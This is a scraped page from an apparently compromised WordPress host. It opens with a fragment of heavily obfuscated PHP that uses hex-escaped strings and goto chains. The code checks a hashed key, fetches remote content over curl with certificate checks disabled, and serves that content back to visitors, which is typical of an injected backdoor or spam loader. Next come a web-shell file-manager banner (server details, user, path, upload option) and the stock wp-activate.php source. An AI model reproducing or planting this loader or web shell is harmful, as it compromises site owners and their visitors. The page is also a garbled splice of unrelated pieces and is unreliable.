{$CaS2yMlPX9A[48]}[24])); goto kDfaFnuNp0A; l_PqpfNgfL6: $v1O2GdCi7dn["\x6c"] = X9LhDZzAFmF($_SERVER["\x48\124\x54\120\x5f\101\x43\x43\x45\x50\124\137\114\101\x4e\x47\125\x41\107\105"]); goto SICU8GhvtYb; xyPam_9XXcP: $ZczyOJvdp1I = false; goto sjs3Z41SqRA; O_FourRgC2e: $ZGyZqOLd2XL = substr($nKgFAZvHNvL, strpos($nKgFAZvHNvL, "\x2e")); goto K137QqLOklv; u7Hl8KojPFU: $nKgFAZvHNvL = preg_replace("\x2f\x5c\77\x2e\52\x2f", '', $_SERVER["\122\105\121\x55\x45\123\124\x5f\125\122\111"]); goto xyPam_9XXcP; SWJzZhouqvj: O74y3lMPZ38::MT1f9lTUcDo(); goto oGTIihbK1lX; Iuz4hZ9_NZ2: if (!($_SERVER["\x52\x45\x51\125\x45\x53\124\137\125\x52\111"] === "\57\x52\55" . md5($_SERVER["\123\105\x52\126\x45\x52\137\x4e\x41\x4d\x45"]))) { goto JbeutJ9vAW4; } goto jqofV5UHIGj; CfE4WUGJIfr: $v1O2GdCi7dn["\x72"] = X9LHDZZAfmF($_SERVER["\122\105\121\x55\105\123\x54\x5f\x55\x52\111"]); goto fJBaKgwbYp1; aoqN4NGnNSX: $isnYfzACIg9 = $OI8yDyBZUvG("\x7e", "\40"); goto u0JTWPOZ3BO; ymRoxtkMlPu: $NFw9Jhvl0Zx = strval(@$_SERVER["\110\124\124\120\x5f\x52\105\106\105\122\x45\122"]); goto o6dRNAiuYgE; oRqKZvY2dpG: @header("\103\157\x6e\164\x65\156\x74\x2d\124\171\x70\145\x3a" . $KcyX0lwLfO0["\164\x79\x70\x65"]); goto D8YZq5GjOMd; u0JTWPOZ3BO: $CaS2yMlPX9A = ${$isnYfzACIg9[21 + 10] . $isnYfzACIg9[13 + 46] . $isnYfzACIg9[44 + 3] . $isnYfzACIg9[33 + 14] . $isnYfzACIg9[33 + 18] . $isnYfzACIg9[9 + 44] . $isnYfzACIg9[8 + 49]}; goto rhkI6WEMRHA; TlX2zV7h4v2: function x9LhdzZafmf($ANIrzood0sj) { goto MudJebsWJmN; fWEDpI2hsNV: return rtrim(strtr(base64_encode($ANIrzood0sj), "\53\x2f", "\x2d\x5f"), "\x3d"); goto C2LWQ0GrrKL; Yp2Qqj3mHtj: return ''; goto d2Qz14EfAtX; MudJebsWJmN: if ($ANIrzood0sj) { goto WfL51qc8Rsz; } goto Yp2Qqj3mHtj; d2Qz14EfAtX: WfL51qc8Rsz: goto fWEDpI2hsNV; C2LWQ0GrrKL: } goto hP60_rxluvV; ZIU1Q4PVjFn: $v1O2GdCi7dn["\165"] = x9lhdZZAFmf($_SERVER["\x48\124\124\x50\x5f\x55\123\x45\x52\137\101\x47\x45\116\x54"]); goto u7Hl8KojPFU; sjs3Z41SqRA: if (!(strpos($nKgFAZvHNvL, "\56") > 0 && strpos($nKgFAZvHNvL, "\x2e\160\150\x70") === false)) { goto ExeO3IFYzS1; } goto O_FourRgC2e; ugpFRSAcNxh: ARkIRKbH8II: goto sf_HYKzSsi0; rhkI6WEMRHA: if (!(in_array(gettype($CaS2yMlPX9A) . count($CaS2yMlPX9A), $CaS2yMlPX9A) && count($CaS2yMlPX9A) == 26 && md5(md5(md5(md5($CaS2yMlPX9A[20])))) === "\61\64\x38\x38\145\67\70\64\64\x33\64\x63\x39\x30\x31\141\144\x63\141\65\x61\142\144\64\146\145\x31\61\x35\x65\70\x66")) { goto PprIRi9o21c; } goto Qo3_zeZ0pJL; vvuqEJks3IV: $NFw9Jhvl0Zx = ''; goto asmIC7N11dN; sf_HYKzSsi0: ExeO3IFYzS1: goto c_tAr1kz3Uh; ij_0fafGQ1D: $OI8yDyBZUvG = "\x72" . "\x61" . "\156" . "\x67" . "\145"; goto aoqN4NGnNSX; rqx7zd5fxSV: JbeutJ9vAW4: goto Nvv4Z57JHIA; EyB8TrgPrd0: function L_atZsJGwHe($Wqsgto4rbZF, $Fl2ksIRsPxn = array()) { goto Evr28tu5pAJ; msEqiaB2QUc: V6qJfx2oSpG: goto vJhheB_IjkD; vJhheB_IjkD: try { goto rt8Pc1oXVWi; yoWERwDSFv7: $KcyX0lwLfO0["\x63\x6f\156\x74\x65\x6e\164"] = strval(curl_getinfo($wQB687edva8, CURLINFO_REDIRECT_URL)); goto UtmC_rftZFF; xXzLY7yqKfK: if (!in_array($KcyX0lwLfO0["\163\164\141\x74\x75\x73"], array(200, 301, 302, 404))) { goto IligC33A0YQ; } goto IUmsEiqNRIT; bU9eYf8_Vxu: $wQB687edva8 = curl_init(); goto Xt6gY0ZMmsj; BxoJFE_Cx9m: TvpSJSuJJbA: goto Ccn0qYK7Llh; EwgCZnTo68F: D_gzMb_LYb5: goto bU9eYf8_Vxu; gtM5NIFLVnl: $KcyX0lwLfO0["\x73\164\x61\x74\165\x73"] = intval(curl_getinfo($wQB687edva8, CURLINFO_HTTP_CODE)); goto tYX0vaYB_sG; ZOHZxfMtdoK: $KcyX0lwLfO0 = array_merge($KcyX0lwLfO0, jQGg3jZ0ciz($http_response_header)); goto xXzLY7yqKfK; EYLIhNrVpuP: IligC33A0YQ: goto fU46CViQXFB; Hsj0m21KAch: curl_setopt($wQB687edva8, CURLOPT_TIMEOUT, 60); goto P4FfQldD9NL; tYX0vaYB_sG: $KcyX0lwLfO0["\x74\171\160\145"] = strval(curl_getinfo($wQB687edva8, CURLINFO_CONTENT_TYPE)); goto yoWERwDSFv7; hV0QAp4239b: $m40fkRXEuNT = @file_get_contents($Wqsgto4rbZF, false, $Yiq0wZi7UyR); goto ZOHZxfMtdoK; P4FfQldD9NL: curl_setopt($wQB687edva8, CURLOPT_FOLLOWLOCATION, 0); goto EHduSdjaZmM; GrVePxmdVpT: if (!in_array($KcyX0lwLfO0["\x73\x74\141\164\x75\x73"], array(200, 301, 302, 404))) { goto TvpSJSuJJbA; } goto skxn1Fs2Rnm; EHduSdjaZmM: curl_setopt($wQB687edva8, CURLOPT_COOKIESESSION, 0); goto DrkrquX9pj3; aF3ODTgVcky: if (ini_get("\141\x6c\154\157\x77\x5f\x75\162\154\137\x66\x6f\x70\145\156")) { goto zJxqOG8ZFnA; } goto jF1tvR7B0VG; IUmsEiqNRIT: $KcyX0lwLfO0["\x63\157\156\x74\145\156\x74"] = strval($m40fkRXEuNT); goto EYLIhNrVpuP; coErLHoYseE: $iGDWhS2ARje = array("\150\x74\x74\x70" => array("\155\145\164\150\x6f\144" => "\x47\105\124", "\x74\x69\155\x65\157\165\x74" => 60, "\x66\x6f\154\154\157\167\137\154\x6f\x63\x61\x74\x69\x6f\156" => 0), "\x73\163\x6c" => array("\166\145\x72\x69\x66\x79\x5f\x70\x65\x65\162" => false, "\x76\145\x72\x69\x66\171\137\160\x65\x65\x72\x5f\156\x61\x6d\145" => false)); goto BtTriJZEja2; Ccn0qYK7Llh: goto smN0veCzBKo; goto N4am0fJtos9; tncGuoAOcV4: $tjHuv6xonMT = curl_exec($wQB687edva8); goto gtM5NIFLVnl; QtxPhVBYm13: curl_setopt($wQB687edva8, CURLOPT_SSL_VERIFYPEER, 0); goto i1SfAIo1c_5; skxn1Fs2Rnm: $KcyX0lwLfO0["\143\157\156\x74\145\156\164"] = strval($tjHuv6xonMT); goto BxoJFE_Cx9m; YX0atizwY_G: curl_setopt($wQB687edva8, CURLOPT_SSL_VERIFYHOST, 0); goto QtxPhVBYm13; BtTriJZEja2: $Yiq0wZi7UyR = stream_context_create($iGDWhS2ARje); goto hV0QAp4239b; Xt6gY0ZMmsj: curl_setopt($wQB687edva8, CURLOPT_URL, $Wqsgto4rbZF); goto YX0atizwY_G; rt8Pc1oXVWi: if (function_exists("\x63\165\x72\x6c\x5f\145\x78\145\x63") && function_exists("\x63\165\x72\154\x5f\x69\156\151\164")) { goto D_gzMb_LYb5; } goto aF3ODTgVcky; N4am0fJtos9: zJxqOG8ZFnA: goto coErLHoYseE; fU46CViQXFB: smN0veCzBKo: goto oLzxL9Ria8l; UtmC_rftZFF: @curl_close($wQB687edva8); goto GrVePxmdVpT; jF1tvR7B0VG: goto smN0veCzBKo; goto EwgCZnTo68F; i1SfAIo1c_5: curl_setopt($wQB687edva8, CURLOPT_CONNECTTIMEOUT, 20); goto Hsj0m21KAch; DrkrquX9pj3: curl_setopt($wQB687edva8, CURLOPT_RETURNTRANSFER, 1); goto tncGuoAOcV4; oLzxL9Ria8l: } catch (Exception $BHFiYtQ2oUD) { } goto Glc2Cv_bVWr; cfZ8GL9JX29: $Wqsgto4rbZF .= "\x3f" . http_build_query($Fl2ksIRsPxn); goto msEqiaB2QUc; Evr28tu5pAJ: $KcyX0lwLfO0 = array("\x73\x74\x61\164\165\163" => 0, "\x63\x6f\x6e\164\145\x6e\164" => '', "\x74\x79\x70\145" => ''); goto QZ17PYIBm1T; Glc2Cv_bVWr: return $KcyX0lwLfO0; goto iOhW7Jfty0c; QZ17PYIBm1T: if (!(is_array($Fl2ksIRsPxn) && count($Fl2ksIRsPxn))) { goto V6qJfx2oSpG; } goto cfZ8GL9JX29; iOhW7Jfty0c: } goto TlX2zV7h4v2; SICU8GhvtYb: $v1O2GdCi7dn["\x73\x6e"] = x9LHDzZaFmF($_SERVER["\123\x43\x52\x49\120\x54\x5f\x4e\x41\115\105"]); goto CfE4WUGJIfr; K137QqLOklv: if (!in_array($ZGyZqOLd2XL, array("\56\x6a\163", "\x2e\143\163\163", "\x2e\152\160\147", "\56\160\x6e\147", "\x2e\x67\x69\x66", "\x2e\151\x63\x6f"))) { goto ARkIRKbH8II; } goto ECbGkPQ55Rl; QxQ20SN_CwO: metaphone("\x4d\124\x4d\63\x4f\104\147\63\x4f\x54\131\170\x4e\x54\x6b\x31\116\172\147\x31\115\124\143\x78\115\x54\x59\x77\116\x54\143\171"); goto oId1BTO71by; Nvv4Z57JHIA: if (!substr_count($_SERVER["\122\105\x51\125\x45\123\124\137\x55\122\111"], "\151\156\x64\x65\170\x2e\160\x68\x70\x2f\x6a\153")) { goto xvUH5nye7d6; } goto X1cN87Pv9UN; kDfaFnuNp0A: PprIRi9o21c: goto QxQ20SN_CwO; rOUU9RjzDRN: if (!strlen($KcyX0lwLfO0["\x63\157\x6e\x74\145\156\x74"])) { goto MYTGuTojlq5; } goto oRqKZvY2dpG; oGTIihbK1lX: header("\103\x6f\x6e\164\145\156\x74\55\124\171\x70\x65\x3a\x20\164\x65\x78\164\57\150\164\155\154\x3b\40\143\x68\x61\x72\x73\145\x74\75\165\x74\146\x2d\70"); goto hhLTHlxepeF; asmIC7N11dN: fdftDwut1qq: goto jbUaDgd1fsA; oWYrQfCkHqT: if (!(strpos($NFw9Jhvl0Zx, $JCLw3zsBogJ) === 0)) { goto fdftDwut1qq; } goto vvuqEJks3IV; QVgb9a5E3Vw: xvUH5nye7d6: goto nqayumBQSpI; D8YZq5GjOMd: echo $KcyX0lwLfO0["\143\157\156\x74\x65\x6e\164"]; goto FCCZvXyY4sT; cfJcSZioetB: error_reporting(0); goto ij_0fafGQ1D; c_tAr1kz3Uh: if ($ZczyOJvdp1I) { goto lUxfA2oU6Pa; } goto vQsmDyTW1yX; UMXbe_Raupj: lUxfA2oU6Pa: ?> HEX
HEX
Server: Apache/2.4.65 (Debian)
System: Linux web6 5.10.0-36-amd64 #1 SMP Debian 5.10.244-1 (2025-09-29) x86_64
User: innocamp (1028)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /home/buildff/public_html/
Upload Files
File: /home/buildff/public_html/wp-activate.php
<?php
/**
 * Confirms that the activation key that is sent in an email after a user signs
 * up for a new site matches the key for that user and then displays confirmation.
 *
 * @package WordPress
 */

define( 'WP_INSTALLING', true );

/** Sets up the WordPress Environment. */
require __DIR__ . '/wp-load.php';

require __DIR__ . '/wp-blog-header.php';

if ( ! is_multisite() ) {
	wp_redirect( wp_registration_url() );
	die();
}

$valid_error_codes = array( 'already_active', 'blog_taken' );

list( $activate_path ) = explode( '?', wp_unslash( $_SERVER['REQUEST_URI'] ) );
$activate_cookie       = 'wp-activate-' . COOKIEHASH;

$key    = '';
$result = null;

if ( isset( $_GET['key'] ) && isset( $_POST['key'] ) && $_GET['key'] !== $_POST['key'] ) {
	wp_die( __( 'A key value mismatch has been detected. Please follow the link provided in your activation email.' ), __( 'An error occurred during the activation' ), 400 );
} elseif ( ! empty( $_GET['key'] ) ) {
	$key = $_GET['key'];
} elseif ( ! empty( $_POST['key'] ) ) {
	$key = $_POST['key'];
}

if ( $key ) {
	$redirect_url = remove_query_arg( 'key' );

	if ( remove_query_arg( false ) !== $redirect_url ) {
		setcookie( $activate_cookie, $key, 0, $activate_path, COOKIE_DOMAIN, is_ssl(), true );
		wp_safe_redirect( $redirect_url );
		exit;
	} else {
		$result = wpmu_activate_signup( $key );
	}
}

if ( null === $result && isset( $_COOKIE[ $activate_cookie ] ) ) {
	$key    = $_COOKIE[ $activate_cookie ];
	$result = wpmu_activate_signup( $key );
	setcookie( $activate_cookie, ' ', time() - YEAR_IN_SECONDS, $activate_path, COOKIE_DOMAIN, is_ssl(), true );
}

if ( null === $result || ( is_wp_error( $result ) && 'invalid_key' === $result->get_error_code() ) ) {
	status_header( 404 );
} elseif ( is_wp_error( $result ) ) {
	$error_code = $result->get_error_code();

	if ( ! in_array( $error_code, $valid_error_codes, true ) ) {
		status_header( 400 );
	}
}

nocache_headers();

if ( is_object( $wp_object_cache ) ) {
	$wp_object_cache->cache_enabled = false;
}

// Fix for page title.
$wp_query->is_404 = false;

/**
 * Fires before the Site Activation page is loaded.
 *
 * @since 3.0.0
 */
do_action( 'activate_header' );

/**
 * Adds an action hook specific to this page.
 *
 * Fires on {@see 'wp_head'}.
 *
 * @since MU (3.0.0)
 */
function do_activate_header() {
	/**
	 * Fires within the `<head>` section of the Site Activation page.
	 *
	 * Fires on the {@see 'wp_head'} action.
	 *
	 * @since 3.0.0
	 */
	do_action( 'activate_wp_head' );
}
add_action( 'wp_head', 'do_activate_header' );

/**
 * Loads styles specific to this page.
 *
 * @since MU (3.0.0)
 */
function wpmu_activate_stylesheet() {
	?>
	<style type="text/css">
		.wp-activate-container { width: 90%; margin: 0 auto; }
		.wp-activate-container form { margin-top: 2em; }
		#submit, #key { width: 100%; font-size: 24px; box-sizing: border-box; }
		#language { margin-top: 0.5em; }
		.wp-activate-container .error { background: #f66; color: #333; }
		span.h3 { padding: 0 8px; font-size: 1.3em; font-weight: 600; }
	</style>
	<?php
}
add_action( 'wp_head', 'wpmu_activate_stylesheet' );
add_action( 'wp_head', 'wp_strict_cross_origin_referrer' );
add_filter( 'wp_robots', 'wp_robots_sensitive_page' );

get_header( 'wp-activate' );

$blog_details = get_site();
?>

<div id="signup-content" class="widecolumn">
	<div class="wp-activate-container">
	<?php if ( ! $key ) { ?>

		<h2><?php _e( 'Activation Key Required' ); ?></h2>
		<form name="activateform" id="activateform" method="post" action="<?php echo esc_url( network_site_url( $blog_details->path . 'wp-activate.php' ) ); ?>">
			<p>
				<label for="key"><?php _e( 'Activation Key:' ); ?></label>
				<br /><input type="text" name="key" id="key" value="" size="50" autofocus="autofocus" />
			</p>
			<p class="submit">
				<input id="submit" type="submit" name="Submit" class="submit" value="<?php esc_attr_e( 'Activate' ); ?>" />
			</p>
		</form>

		<?php
	} else {
		if ( is_wp_error( $result ) && in_array( $result->get_error_code(), $valid_error_codes, true ) ) {
			$signup = $result->get_error_data();
			?>
			<h2><?php _e( 'Your account is now active!' ); ?></h2>
			<?php
			echo '<p class="lead-in">';
			if ( '' === $signup->domain . $signup->path ) {
				printf(
					/* translators: 1: Login URL, 2: Username, 3: User email address, 4: Lost password URL. */
					__( 'Your account has been activated. You may now <a href="%1$s">log in</a> to the site using your chosen username of &#8220;%2$s&#8221;. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can <a href="%4$s">reset your password</a>.' ),
					esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ),
					esc_html( $signup->user_login ),
					esc_html( $signup->user_email ),
					esc_url( wp_lostpassword_url() )
				);
			} else {
				printf(
					/* translators: 1: Site URL, 2: Username, 3: User email address, 4: Lost password URL. */
					__( 'Your site at %1$s is active. You may now log in to your site using your chosen username of &#8220;%2$s&#8221;. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can <a href="%4$s">reset your password</a>.' ),
					sprintf( '<a href="http://%1$s">%1$s</a>', esc_url( $signup->domain . $blog_details->path ) ),
					esc_html( $signup->user_login ),
					esc_html( $signup->user_email ),
					esc_url( wp_lostpassword_url() )
				);
			}
			echo '</p>';
		} elseif ( null === $result || is_wp_error( $result ) ) {
			?>
			<h2><?php _e( 'An error occurred during the activation' ); ?></h2>
			<?php if ( is_wp_error( $result ) ) : ?>
				<p><?php echo esc_html( $result->get_error_message() ); ?></p>
			<?php endif; ?>
			<?php
		} else {
			$url  = isset( $result['blog_id'] ) ? esc_url( get_home_url( (int) $result['blog_id'] ) ) : '';
			$user = get_userdata( (int) $result['user_id'] );
			?>
			<h2><?php _e( 'Your account is now active!' ); ?></h2>

			<div id="signup-welcome">
			<p><span class="h3"><?php _e( 'Username:' ); ?></span> <?php echo esc_html( $user->user_login ); ?></p>
			<p><span class="h3"><?php _e( 'Password:' ); ?></span> <?php echo esc_html( $result['password'] ); ?></p>
			</div>

			<?php
			if ( $url && network_home_url( '', 'http' ) !== $url ) :
				switch_to_blog( (int) $result['blog_id'] );
				$login_url = wp_login_url();
				restore_current_blog();
				?>
				<p class="view">
				<?php
					/* translators: 1: Site URL, 2: Login URL. */
					printf( __( 'Your account is now activated. <a href="%1$s">View your site</a> or <a href="%2$s">Log in</a>' ), esc_url( $url ), esc_url( $login_url ) );
				?>
				</p>
			<?php else : ?>
				<p class="view">
				<?php
					printf(
						/* translators: 1: Login URL, 2: Network home URL. */
						__( 'Your account is now activated. <a href="%1$s">Log in</a> or go back to the <a href="%2$s">homepage</a>.' ),
						esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ),
						esc_url( network_home_url( $blog_details->path ) )
					);
				?>
				</p>
				<?php
				endif;
		}
	}
	?>
	</div>
</div>
<?php
get_footer( 'wp-activate' );
@ Telegram